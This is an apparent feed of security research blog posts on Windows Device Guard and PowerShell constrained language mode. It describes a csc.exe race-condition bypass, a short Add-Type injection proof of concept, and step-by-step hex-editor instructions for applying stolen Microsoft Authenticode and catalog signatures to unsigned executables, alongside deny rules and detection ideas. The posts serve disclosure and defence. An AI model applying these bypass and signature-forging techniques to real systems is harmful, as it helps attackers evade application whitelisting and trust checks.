What resulted was the following ruleset. Everything looked fine except for a single Microsoft rule generated which was associated with d3dcompiler_47.dll. I looked in my master rule policy and I already had this rule. Me being obsessive compulsive wanted a pristine ruleset including only Google rules. This is good practice anyway once you get in the habit of managing large whitelist rulesets. You'll want to keep separate policy XMLs for each whitelisting scenario you run into and then merge accordingly. After removing the MS binary from the list, what resulted was a much cleaner ruleset (Publisher applied this time) consisting of only two signer rules.

$OnlyGooglePEs=$GooglePEs|? { -not$_.FriendlyName.EndsWith('d3dcompiler_47.dll') }
New-CIPolicy-FilePathGoogle_Publisher.xml-DriverFiles$OnlyGooglePEs-LevelPublisher-UserPEs

So now, all I should need to do is merge the new rules into my master ruleset, redeploy, reboot, and if all works well, Chrome should install and execute without issue.

$MasterRuleXml='FinalPolicy.xml'
$ChromeRules=New-CIPolicyRule-DriverFiles$OnlyGooglePEs-LevelPublisher
Merge-CIPolicy-OutputFilePathFinalPolicy_Merged.xml-PolicyPaths$MasterRuleXml-Rules$ChromeRules
ConvertFrom-CIPolicy-XmlFilePath.\FinalPolicy_Merged.xml-BinaryFilePathSIPolicy.p7b
# Finally, on the Device Guard system, replace the existing
# SIPolicy.p7b with the one that was just generated and reboot.

One thing I neglected to account for was the initial Chrome installer binary. I could have incorporated the binary into this process but I wanted to try my luck that Google used the same certificates to sign the installer binary. To my luck, they did and everything installed and executed perfectly. I would consider myself lucky in this case because I selected a software publisher (Google) who employs decent code signing practices.

Conclusion

In future blog posts, I will document my experiences deploying software that doesn't adhere to proper signing practices or doesn't even sign their code. Hopefully, the Google Chrome case study will, at a minimum, ease you into the process of updating code integrity policies for new software deployments.

The bottom line is that this isn't an easy process. Are there ways in which Microsoft could improve the code integrity policy generation/update/deployment/auditing experience? Absolutely! Even if they did though, the responsibility ultimately lies on you to make informed decisions about what software you trust and how you choose to enforce that trust!

PowerShell is Not Special - An Offensive PowerShell Retrospective

$
0
0
“PowerShell is not special.”

During Jared Haight’s excellent DerbyCon presentation, he uttered this blasphemous sentence. As someone who has invested the last five years of his life learning and mastering PowerShell, at a surface level, it was easy to dismiss such a claim. However, I’ve done a lot of introspection about my investment in offensive PowerShell and the more I thought about it, the more I began to realize that PowerShell really isn’t that special! Before you bring out the torches and pitchforks, allow me apply context.

My first exposure to PowerShell was from Dave Kennedy and Josh Kelley during their DEF CON presentation – PowerShell OMFG. Initially, I considered PowerShell to be amusing from a security perspective. I was just getting my start in infosec, however, and I had a lot of other things that I needed to focus on. Not long after that talk, Chris Campbell (@obscuresec) then took a keen interest in PowerShell and heavily advocated that we start using it on our team. My obsession for PowerShell wasn’t solidified until I realized that it could be used as a shellcode runner. When I realized that there really wasn’t anything PowerShell couldn’t do, my interest in and promotion of offensive PowerShell was truly realized.

For years, I did my part in developing unique offensive capabilities in PowerShell to the approval of many in the community and to the disappointment of defenders and employees of Microsoft. At the time, their disappointment and frustration was justified to an extent. When I started writing offensive PowerShell code, v3 hadn’t been released so the level of detection was laughable. Fast forward to now – PowerShell v5 (which is available downlevel to Windows 7). I challenge anyone to identify a single language – scripting, interpreted, compiled, or otherwise that has better logging than PowerShell v5. Additionally, if defenders choose to employ whitelisting to enforce trusted PowerShell code, both AppLocker and Device Guard do what many still (mistakenly) believe the execution policy was intended to do – actually perform signature enforcement of PowerShell code.

While PowerShell has become extremely popular amongst pentesters, red-teamer, criminals, and state-sponsored actors, let’s not forget that we’re still getting compromised by compiled payloads every... freaking... day. PowerShell really is just a means to an end in achieving an attacker’s objective - now at the cost of generating significant noise with the logging offered by PowerShell v5. PowerShell obviously offers many distinct advantages for attackers that I highlighted years ago but defenders and security vendors are slowly but surely catching up with detecting PowerShell attacks. Additionally, with the introduction of AMSI, for all of its flaws, we now have AV engines that can scan arbitrary buffers in memory.

So in the context of offense, this is why I say that PowerShell really isn’t special. Defenders truly are armed with the tools they need to detect and mitigate against PowerShell attacks. So the next time you find yourself worrying about PowerShell attacks, make sure you’re worrying equally, if not more about every other kind of payload that could execute on your system. Don’t be naïve, however, and write PowerShell off as a “solved problem.” There will always continue to be innovative bypass/evasion research in the PowerShell space. Let’s continue to bring this to the public’s attention and the community will continue to benefit from the fruits of offensive and defensive research.

References for securing/monitoring PowerShell:

Bypassing Device Guard with .NET Assembly Compilation Methods

$
0
0
Tl;dr

This post will describe a Device Guard user mode code integrity (UMCI) bypass (or any other application whitelisting solution for that matter) that takes advantage of the fact the code integrity checks are not performed on any code that compiles C# dynamically with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made to not service this bypass. This bypass can be mitigated by blocking csc.exe but that may not be realistic in your environment considering the frequency in which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

Introduction

When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe – the C# compiler to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

Process Name Operation  Path
------------ ---------  ----
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

Upon seeing these files created, I asked myself the following questions:
  1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
  2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

Research methodology
Let’s start with the second question since exploitation would be impossible if CI would prevent the loading of a hijacked, unsigned DLL. To answer this question, I needed to determine what .NET methods were called upon Add-Type being called. This determination was relatively easy by tracing method calls in dnSpy. I quickly traced execution of the following .NET methods:
Once the Microsoft.CSharp.CSharpCodeGenerator.Compile method is called, this is where csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks – a known Device Guard UMCI bypassed discovered by Casey Smith. Knowing this, I gained the confidence that if I could hijack the dropped .cs file, I would end up having a constrained language mode bypass, allowing arbitrary unsigned code execution. What we’re referring to here is known as a “time of check time of use” (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win that race and perform the bypass. The only constraints imposed on me, however, would be that I would need to write a hijack payload within the constraints of constrained language mode. As it turns out, I was successful.

Exploitation

I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
  1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
  2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
  3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type – I chose the PSDiagnostics process for this.
  4. Kill the child PowerShell process.
  5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.

Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.

Operational Considerations

It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

Prevention

Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply to when PowerShell calls Add-Type, but when any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

# Copy csc.exe into the following directory
# csc.exe should be the only file in this directory.
$CSCTestPath='.\Desktop\ToBlock\'
$PEInfo=Get-SystemDriver-ScanPath$CSCTestPath-UserPEs-NoShadowCopy

$DenyRule=New-CIPolicyRule-LevelFileName-DriverFiles$PEInfo-Deny
$DenyRule[0].SetAttribute('MinimumFileVersion','65535.65535.65535.65535')

$CIArgs= @{
    FilePath ="$($CSCTestPath)block_csc.xml"
    Rules =$DenyRule
    UserPEs =$True
}

New-CIPolicy@CIArgs

Detection

Unfortunately, detection using free, off-the-shelf tools will be difficult due to the fact that the disk artifacts are created and subsequently deleted and by the nature of System.Reflection.Assembly.Load(byte[]) not generating a traditional module load event that something like Sysmon would be able to detect.

Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

Conclusion

I remain optimistic of Device Guard’s ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception and not the norm. Please don’t let this discourage you from reporting any bypasses that you may find to secure@microsoft.com. It is my hope that by releasing this bypass that it will eventually be addressed and it will provide other vendors with the opportunity to mitigate.

Previously serviced bypasses for reference:

Application of Authenticode Signatures to Unsigned Code

$
0
0
Attackers have been known to apply legitimate digital certificates to their malware, presumably, to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods in which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques describing the application of digital certificates to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

Background


What does it mean for a PE file (exe, dll, sys, etc.) to be signed? The simple answer to many is to open up the file properties on a PE and if a “Digital Signatures” tab is present, it means it was signed. When you see that the “Digital Signatures” tab is present on a file, it actually means that the PE file was Authenticode signed, which means within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash which doesn’t consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


Many files that one would expect to be signed, however, (for example, consider notepad.exe) do not have a “Digital Signatures” tab. Does this mean that the file isn’t signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just a list of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to lookup catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}


In the above screenshot, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

sigcheck -q -h -i C:\Windows\System32\notepad.exe
c:\windows\system32\notepad.exe:
  Verified:       Signed
  Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat
  Signers:
    Microsoft Windows
      Status:         Valid
      Valid Usage:    NT5 Crypto, Code Signing
      Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06
      Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     1:39 PM 10/11/2016
      Valid to:       1:39 PM 1/11/2018
    Microsoft Windows Production PCA 2011
      Status:         Valid
      Valid Usage:    All
      Serial Number:  61 07 76 56 00 00 00 00 00 08
      Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     11:41 AM 10/19/2011
      Valid to:       11:51 AM 10/19/2026
    Microsoft Root Certificate Authority 2010
                Status:         Valid
                Valid Usage:    All
                Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A
                                9B 58 6B 43 39 AA
                Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
                Algorithm:      1.2.840.113549.1.1.11
                Valid from:     2:57 PM 6/23/2010
                Valid to:       3:04 PM 6/23/2035
    Signing date:   1:02 PM 3/18/2017
    Counter Signers:
      Microsoft Time-Stamp Service
        Status:         Valid
        Valid Usage:    Timestamp Signing
        Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3
        Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     10:56 AM 9/7/2016
        Valid to:       10:56 AM 9/7/2018
      Microsoft Time-Stamp PCA 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  61 09 81 2A 00 00 00 00 00 02
        Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:36 PM 7/1/2010
        Valid to:       2:46 PM 7/1/2025
      Microsoft Root Certificate Authority 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA
        Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:57 PM 6/23/2010
        Valid to:       3:04 PM 6/23/2035
    Publisher:      Microsoft Windows
    Description:    Notepad
    Product:        Microsoft« Windows« Operating System
    Prod version:   10.0.15063.0
    File version:   10.0.15063.0 (WinBuild.160101.0800)
    MachineType:    64-bit
    MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A
    SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA
    PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E
    PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E
    SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA
    IMP:    645E8D8B0AEA808FF16DAA70D6EE720E

Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:



Digital Signature Binary Format


Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
  1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
  2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data
It is worth spending time exploring all of the fields contained within a digital signature. All fields present are outside of the scope of this blog post, however. Additional crypto/signature-related OIDs are listed here.

Embedded PE Authenticode Signature Retrieval


The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


The offset and size of the embedded digital signature is stored in the “security directory” offset within the “data directories” array within the optional header. The data directory contains offsets and size of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual offsets (RVA) meaning they are the offset to the respective portion of the PE when loaded in memory. There is one exception though - the security directory which stores its offset as a file offset. The reason for this is because the Windows loader doesn’t actually load the content of the security directory in memory.

The binary data in the at the security directory file offset is a WIN_CERTIFICATE structure. Here’s what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):


PE Authenticode signatures should always have a wRevision of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn’t find the 1.3.6.1.4.1.311.12.1.1 OID, indicating the presence of catalog hashes.

Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:


Application of Digital Signatures to Unsigned PEs


Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

Application of Embedded Authenticode Signatures


Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


That’s it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report that the signature is invalid because the calculated Authenticode of the file does not match that of the signed hash stored in the certificate.


Now, if you were wondering why the SignerCertificate thumbprint values don’t match, then you are an astute reader. Considering we applied the identical signature, why doesn’t the certificate thumbprint match? That’s because Get-AuthenticodeSignature first attempts a catalog file lookup of kernel32.dll. In this case, it found a catalog entry for kernel32.dll and is displaying the signature information for the signer of the catalog file. kernel32.dll is also Authenticode signed though. To validate that the thumbprint values for the Authenticode hashes are identical, temporarily stop the CryptSvc service - the service responsible for performing catalog hash lookups. Now you will see that the thumbprint values match. This indicates that the catalog hash was signed with a different code signing certificate from the certificate used to sign kernel32.dll itself.


Application of a Catalog Signature to a PE File


Realistically, CryptSvc will always be running and catalog lookups will be performed. Suppose you want to be mindful of OPSEC and match the identical certificate used to sign your target binary. It turns out, you can actually apply the contents of a catalog file to an embedded PE signature by swapping out the contents of bCertificate in the WIN_CERTIFICATE structure and updating dwLength accordingly. Feel free to follow along as this is done. Note that our goal (in this case) is to apply an Authenticode signature to our unsigned binary that is identical to the one used to sign the containing catalog file: Certificate thumbprint AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033 in this case.

Step #1: Identify the catalog file containing the Authenticode hash of the target binary - kernel32.dll in this case. If a file is Authenticode signed, sigcheck will actually fail to resolve the catalog file. Signtool (included in the Windows SDK) will, however.


Step #2: Open the catalog file in in a hex editor and annotate the file size - 0x000137C7


Step #3: We’re going to manually craft a WIN_CERTIFICATE structure in a hex editor. Let’s go through each field we’ll supply:
  1. dwLength: This is the total length of the WIN_CERTIFICATE structure - i.e. bCertificate bytes plus the size of the other fields = 4 (size of DWORD) + 2 (size of WORD) + 2 (size of WORD) + 0x000137C7 (bCertificate - the file size of the .cat file) = 0x000137CF.
  2. wRevision: This will be 0x0200 to indicate WIN_CERT_REVISION_2_0.
  3. wCertificateType: This will be 0x0002 to indicate WIN_CERT_TYPE_PKCS_SIGNED_DATA.
  4. bCertificate: This will consist of the raw bytes of the catalog file.
When crafting the bytes in the hex editor, be mindful that the fields are stored in little-endian format.


Step #4: Copy all the bytes from the crafted WIN_CERTIFICATE, append them your unsigned PE, and update the security directory offset and size accordingly.


Now, assuming your calculations and alignments were proper, behold a thumbprint match with that of the catalog file!



Anomaly Detection Ideas


The techniques presented in this blog post have hopefully got some people thinking about how one might go about detecting the abuse of digital signatures. While I have not investigated signature heuristics thoroughly, let me just pose a series of questions that might motivate others to start investigating and writing detections for potential signature anomalies:
  • For a legitimately signed Microsoft PE, is there any correlation between the PE timestamp and the certificate validity period? Would the PE timestamp for attacker-supplied code deviate from the aforementioned correlation?
  • After reading this article, what is your level of trust in a “signed” file that has a hash mismatch?
  • How would you go about detecting a PE file that has an embedded Authenticode signature consisting of a catalog file? Hint: A specific OID mentioned earlier might be useful.
  • How might you go about validating the signature of a catalog-signed file on a different system?
  • What effect might a stopped/disabled CryptSvc service have on security products performing local signature validation? If that was to occur, then most system files, for all intents and purposes will cease to be signed.
  • Every legitimate PE I’ve seen is padded on a 0x10 byte boundary. The example I showed where I applied the catalog contents to an Authenticode signature is not 0x10 byte aligned.
  • How might you differentiate between a legitimate Microsoft digital signature and one where all the certificate attributes are applied to a self-signed certificate?
  • What if there is data appended beyond the digital signature? This has been abused in the past.
  • Threat intel professionals should find the Authenticode hash to be an interesting data point when investigating identical code with different certificates applied. VirusTotal supplies this as the "Authentihash" value: i.e. the hash value that was calculated with "sigcheck -h". If I were investigating variants of a sample that had more than one hit on a single Authentihash in VirusTotal, I would find that to be very interesting.

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained Language Mode

$
0
0

Introduction


Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. It’s most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attackers ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

lsC:\*-Recurse-Include'*.ps1','*.psm1'|
  Select-String-Pattern'Add-Type'|
  SortPath-Unique|
  % { Get-AuthenticodeSignature-FilePath$_.Path } |
  ? { $_.SignerCertificate.Subject -match'Microsoft'}

Exploitation


Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

$Global:Source=@'
public class Test {
    public static string PrintString(string inputString) {
        return inputString;
    }
}
'@

Add-Type-TypeDefinition$Global:Source

Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:
  1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
  2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
  3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization


Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:

Set-Variable-NameSource-ScopeGlobal-OptionReadOnly-Value@'
public class Injected {
    public static string ToString(string inputString) {
        return inputString;
    }
}
'@

Import-ModuleVulnModule

[Injected]::ToString('Injected!!!')

A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest. Matt Nelson and I reported a bunch of these injection bugs that were serviced by the awesome PowerShell team.

Prevention


The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single quoted string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

Mitigation


While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging. Lee Holmes has an excellent post on how to effectively block older versions of PowerShell in his blog post here.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Such bypass scripts exist. Just ask Matt Nelson.

Reporting


If you find a bypass, report it to secure@microsoft.com and earn yourself a CVE. The PowerShell team actively addresses injection flaws, but they are also taking making proactive steps to mitigate many of the primitives used to influence code execution in these classes of bug.

Conclusion


While constrained language mode remains an extremely effective means of preventing unsigned code execution, PowerShell and it’s library of signed modules/scripts remain to be a large attack surface. I encourage everyone to seek out more injection vulns, report them, earn credit via formal MSRC acknowledgements, and make the PowerShell ecosystem a more secure place. And hopefully, as a writer of PowerShell code, you’ll find yourself thinking more often about how an attacker might be able to influence the execution of your code.

Now, everything that I just explained is great but it turns out that any call to Add-Type remains vulnerable to injection due to an design issue that permits exploiting a race condition. I really hope that continuing to shed light on these issues, Microsoft will considering addressing this fundamental issue.

Device Guard and Application Whitelisting on Windows - An Airing of Grievances

$
0
0

Introduction

The purpose of this post is to highlight many of the frustrations I’ve had with Device Guard (rebranded as Windows Defender Application Control) and to discuss why I think it is not an ideal solution for most enterprise scenarios at scale. I’ve spent several years now at this point promoting its use, making it as approachable as possible for people to adopt but from my perspective, I’m not seeing it being openly embraced either within the greater community or by Microsoft (from a public evangelism perspective). Why is that? Hopefully, by calling out the negative experiences I’ve had with it, we might be able to shed a light on what improvements can be made, whether or not further investments should be made in Device Guard, or if application whitelisting is even really feasible in Windows (in its current architecture) for the majority of customer use cases.

In an attempt to prove that I’m not just here to complain for the sake of complaining, here is a non-exhaustive list of blog posts and conference presentations I’ve given promoting Device Guard as a solution:

  • Introduction to Windows Device Guard: Introduction and Configuration Strategy
